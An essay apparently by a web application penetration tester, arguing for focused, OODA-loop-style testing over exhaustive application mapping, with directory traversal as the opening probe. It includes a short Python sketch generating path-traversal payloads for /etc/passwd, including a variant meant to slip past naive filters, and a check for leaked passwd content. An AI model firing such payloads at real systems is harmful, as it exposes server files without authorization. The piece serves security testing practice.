Wherever you put your mind, there you are. – K. Slatoff
The world around you is complex, rich, and, frankly, a bit overwhelming if you try to take it all in at once. Your brain simply can’t make sense of all of it at the same time. The very act of observing and analyzing the world pulls you out of the experience and filters out much of what is there. Focusing on one thing means ignoring everything else, because the whole is far more than we can handle. Luckily, we generally don’t have to handle it.
The bits and pieces we actually focus on give us what we need to decide what should happen next. This is the natural premise John Boyd outlines with his OODA loop: we experience the world through a cycle of pulling in information, figuring out what deserves focus, deciding what to do, and then acting on it. Often the action we take is to gather supplemental information, giving us better insight to decide and act upon. The military, especially the Marine Corps, has invested an enormous amount of effort and strategy in this OODA concept. It’s the lifeblood of maneuver warfare.
I’ve been trying to distill the principles and concepts of this warfighting methodology into my work, retooling my testing approach to be more rapid, strategic, and natural. I’ve already discussed how certain targets make more sense from a breaching perspective, but I’ve also recently come to believe that most information collected outside of those targets isn’t tremendously useful. In fact, though some might call this heresy, I think most of the methodology I’ve reviewed is deeply flawed when it comes to information gathering. Nearly every approach prescribes a massive up-front collection effort, and then wants you to weed your way through it to discern what is vulnerable. The waterfall approach works only in limited scenarios for building software; I’m not sure why we think it would work for testing it.
“The purpose of analysis is not to understand the universe, but to direct you toward focused action” – Flawless Consulting
Consider how your body works naturally. If you flood it with too much information, you can’t act on it; you quickly become overloaded with noise that keeps you from orienting, deciding, and acting. Yet most methodologies point you to some form of “application mapping.” On the surface, having a collection of every single fuzzable parameter seems enticing. But in reality, what do you plan on doing with that list? Would it make sense to turn on every TV and radio in your home and try to listen to a single song? Without any context, how could you possibly know which of those parameters are control points? Without context, are you really planning on throwing every single payload in FuzzDB at each one? Without context, how would you tell whether a simple modification to those payloads would make all the difference? The short answer is that you can’t, or at least not very well. Some people call this thorough… I think it’s mostly an expensive waste of time.
What if I instead started a test by focusing on one strategic vulnerability: directory traversal. I like to start here because, if I can accomplish it, I have the potential to turn the test into an involuntary code review. I would no longer need a kitchen-sink extraction of all data; I merely want to answer three questions: where, how, and whether it’s vulnerable. For the where, I’d hunt for file upload and download functionality. I’d look at how files are served, especially dynamic content. Then I’d move on to the component’s “happy path”: what should it normally do? After watching the successful flow of a handful of pages, I’d have enough of the “how” to start testing abuse cases. I’d focus first on how different input is handled, watching how the application behaves when given the unexpected. Each test provides the answers I need to move from one stage to the next. Everything has a functional, pragmatic purpose: no wasted movement.
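To make the abuse-case step concrete, here’s a minimal sketch of the kind of probe list I mean. Everything in it is illustrative: the target file, the traversal depth, and the success heuristic are all assumptions, not a complete or authoritative payload set, and any real probing belongs only on systems you’re authorized to test.

```python
from urllib.parse import quote

def traversal_payloads(target="etc/passwd", depth=4):
    """Yield a few common encodings of a dot-dot-slash path for one target file."""
    base = "../" * depth + target
    yield base                           # plain ../../../../etc/passwd
    yield quote(base, safe="")           # fully URL-encoded variant
    yield base.replace("../", "..%2f")   # encoded-slash-only variant
    yield base.replace("../", "....//")  # survives naive "../" stripping filters

def looks_like_passwd(body):
    """Crude success heuristic: does a response body resemble /etc/passwd?"""
    return "root:" in body and ":/bin/" in body

if __name__ == "__main__":
    for payload in traversal_payloads():
        print(payload)
```

Note how small this is compared to a kitchen-sink fuzz run: a handful of variants, each chosen because the happy-path observation suggested how the file path is handled, and a cheap check to tell me immediately whether to dig deeper or move on.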
If directory traversal didn’t exist, so what? I’ve still learned a great deal about the application and how it works. Because I was gathering information as I went, that information can be reapplied to the next attack, maybe SQL injection, which would teach me still more about the application. I continue through my direct breaching points, because they might let me shortcut my visibility problem, until I am done. Even if they all failed, I’d bet I’d end up with a more concrete understanding of how the application works than if I had gone the other route.
I’d also bet that most people naturally gravitate toward this. Though other approaches seem well thought out from an academic perspective, in practice I have found them stifling and often wasteful. Fortunately I get to dogfood this concept every day, and I can say the benefits have been substantial. Starting with tests that immediately affect the system gives you initiative and concrete experience. When they succeed, they give you visibility not otherwise possible. And using a natural strategy designed NOT to overwhelm your mind is pretty great too. Working exploits teach you so much about an application, so why not streamline your approach to them?
One last thought: even in one of the best dossiers I’ve seen assembled for attacking a specific site, the focus was only on gathering information relevant to specific, actionable attacks. Everything else was irrelevant to that goal, and subsequently not needed.
Food for thought.